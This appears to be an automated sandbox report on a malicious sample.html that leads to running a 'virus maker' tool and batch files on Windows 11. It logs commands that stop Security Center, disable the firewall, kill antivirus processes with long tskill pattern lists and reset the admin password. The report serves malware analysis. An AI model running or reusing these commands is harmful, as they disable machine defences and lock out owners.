Analysis
max time kernel: 900s
max time network: 1176s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 24-05-2024 18:18
Static task: static1

General
Target: sample.html
Size: 16KB
MD5: 3a8fb09f8cfd8c9012520e9d45f961ba
SHA1: faba2dba5063476f5f8742932963249d81c5c0cb
SHA256: 3464373dc628c72a680e4c69c3dd73c3aea0f66a8b509933f5818e516fc03985
SHA512: d144ba21d218fd3f77f66665577c40c048c4bc6f30efa1ad3b2e3ecc9d95eeb425dd2b02243b20410a3c3c6bf2625c342e6f6299ba48c49c648f7e2ea14d49d4
SSDEEP: 192:x4ufWIyc+MDg9PxUfrULIAFCy8GAGYoQN6S5+MO2FHB/ibLDiTkok:x0Vig9pUfrUz8GAGM6O+x2V1i/DiTkn
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes: netsh.exe
pid 4456 netsh.exe
pid 2420 netsh.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops autorun.inf file 1 TTPs 64 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes: cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
-
Modifies registry class 58 IoCs
Processes: Bhavesh Virus Maker.exe, msedge.exe, MiniSearchHost.exe
-
NTFS ADS 1 IoCs
Processes: msedge.exe
File opened for modification C:\Users\Admin\Downloads\Bhavesh Virus Maker v1.0.0.1.zip:Zone.Identifier (msedge.exe)
-
Runs .reg file with regedit 1 IoCs
Processes: regedit.exe
pid 3128 regedit.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: msedge.exe, identity_helper.exe, tskill.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Bhavesh Virus Maker.exe
pid 4320 Bhavesh Virus Maker.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes: msedge.exe
-
Suspicious use of FindShellTrayWindow 47 IoCs
Processes: msedge.exe, Bhavesh Virus Maker.exe
-
Suspicious use of SendNotifyMessage 18 IoCs
Processes: msedge.exe, Bhavesh Virus Maker.exe
-
Suspicious use of SetWindowsHookEx 11 IoCs
Processes: Bhavesh Virus Maker.exe, MiniSearchHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff8eb03cb8,0x7fff8eb03cc8,0x7fff8eb03cd8
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2788 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5992 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6004 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6992 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:12⤵
-
- C:\Windows\System32\CompPkgSrv.exe
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\rundll32.exe
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Users\Admin\AppData\Local\Temp\Temp1_Bhavesh Virus Maker v1.0.0.1.zip\Bhavesh Virus Maker\Bhavesh Virus Maker\bin\Debug\Bhavesh Virus Maker.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Temp1_Bhavesh Virus Maker v1.0.0.1.zip\Bhavesh Virus Maker\Bhavesh Virus Maker\bin\Debug\Bhavesh Virus Maker.exe"
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\adad.bat" "
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\wannadie.bat" "
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\wannadie.bat" "
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\adad.bat" "
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\dadadaadad.bat" "
  - C:\Windows\system32\cmd.exe
    command line: cmd.exe
  - C:\Windows\system32\net.exe
    command line: net stop "Security Center"
    - C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 stop "Security Center"
  - C:\Windows\system32\netsh.exe
    command line: netsh firewall set opmode mode=disable
    - Modifies Windows Firewall
  - C:\Windows\system32\tskill.exe
    command line: tskill /A av*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A fire*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A anti*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A spy*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A bullguard
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A PersFw
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A KAV*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ZONEALARM
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A SAFEWEB
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A OUTPOST
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A nv*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A nav*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A F-*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ESAFE
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A cle
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A BLACKICE
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A def*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A kav
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A kav*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A avg*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ash*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A aswupdsv
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ewid*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A guard*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A guar*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A msmp*
    - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\tskill.exe
    command line: tskill /A mcafe*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A mghtml
  - C:\Windows\system32\tskill.exe
    command line: tskill /A msiexec
  - C:\Windows\system32\tskill.exe
    command line: tskill /A outpost
  - C:\Windows\system32\tskill.exe
    command line: tskill /A isafe
  - C:\Windows\system32\tskill.exe
    command line: tskill /A zap*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A zauinst
  - C:\Windows\system32\tskill.exe
    command line: tskill /A upd*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A zlclien*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A minilog
  - C:\Windows\system32\tskill.exe
    command line: tskill /A cc*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A norton*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A norton au*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ccc*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A npfmn*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A loge*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A nisum*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A issvc
  - C:\Windows\system32\tskill.exe
    command line: tskill /A tmp*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A tmn*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A pcc*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A cpd*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A pop*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A pav*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A padmin
  - C:\Windows\system32\tskill.exe
    command line: tskill /A panda*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A avsch*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A sche*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A syman*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A virus*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A realm*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A sweep*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A scan*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ad-*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A safe*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A avas*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A norm*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A offg*
- C:\Windows\regedit.exe
  command line: "regedit.exe" "C:\Users\Admin\Desktop\nokeyboard.reg"
  - Runs .reg file with regedit
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\dadadaadad.bat" "
  - Drops autorun.inf file
  - C:\Windows\system32\cmd.exe
    command line: cmd.exe
  - C:\Windows\system32\net.exe
    command line: net stop "Security Center"
    - C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 stop "Security Center"
  - C:\Windows\system32\netsh.exe
    command line: netsh firewall set opmode mode=disable
    - Modifies Windows Firewall
  - C:\Windows\system32\tskill.exe
    command line: tskill /A av*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A fire*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A anti*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A spy*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A bullguard
  - C:\Windows\system32\tskill.exe
    command line: tskill /A PersFw
  - C:\Windows\system32\tskill.exe
    command line: tskill /A KAV*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ZONEALARM
  - C:\Windows\system32\tskill.exe
    command line: tskill /A SAFEWEB
  - C:\Windows\system32\tskill.exe
    command line: tskill /A OUTPOST
  - C:\Windows\system32\tskill.exe
    command line: tskill /A nv*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A nav*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A F-*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ESAFE
  - C:\Windows\system32\tskill.exe
    command line: tskill /A cle
  - C:\Windows\system32\tskill.exe
    command line: tskill /A BLACKICE
  - C:\Windows\system32\tskill.exe
    command line: tskill /A def*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A kav
  - C:\Windows\system32\tskill.exe
    command line: tskill /A kav*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A avg*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ash*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A aswupdsv
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ewid*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A guard*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A guar*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A msmp*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A mcafe*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A mghtml
  - C:\Windows\system32\tskill.exe
    command line: tskill /A msiexec
  - C:\Windows\system32\tskill.exe
    command line: tskill /A outpost
  - C:\Windows\system32\tskill.exe
    command line: tskill /A isafe
  - C:\Windows\system32\tskill.exe
    command line: tskill /A zap*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A zauinst
  - C:\Windows\system32\tskill.exe
    command line: tskill /A upd*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A zlclien*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A minilog
  - C:\Windows\system32\tskill.exe
    command line: tskill /A cc*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A norton*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A norton au*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ccc*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A npfmn*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A loge*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A nisum*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A issvc
  - C:\Windows\system32\tskill.exe
    command line: tskill /A tmp*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A tmn*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A pcc*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A cpd*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A pop*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A pav*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A padmin
  - C:\Windows\system32\tskill.exe
    command line: tskill /A panda*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A avsch*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A sche*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A syman*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A virus*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A realm*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A sweep*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A scan*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A ad-*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A safe*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A avas*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A norm*
  - C:\Windows\system32\tskill.exe
    command line: tskill /A offg*
  - C:\Windows\system32\net.exe
    command line: net user Admin Bhavesh
    - C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user Admin Bhavesh
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\wadawda.bat" "
  - Drops autorun.inf file
  - C:\Windows\system32\net.exe
    command line: net user Admin Bhavesh
    - C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user Admin Bhavesh
- C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
  command line: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
Downloads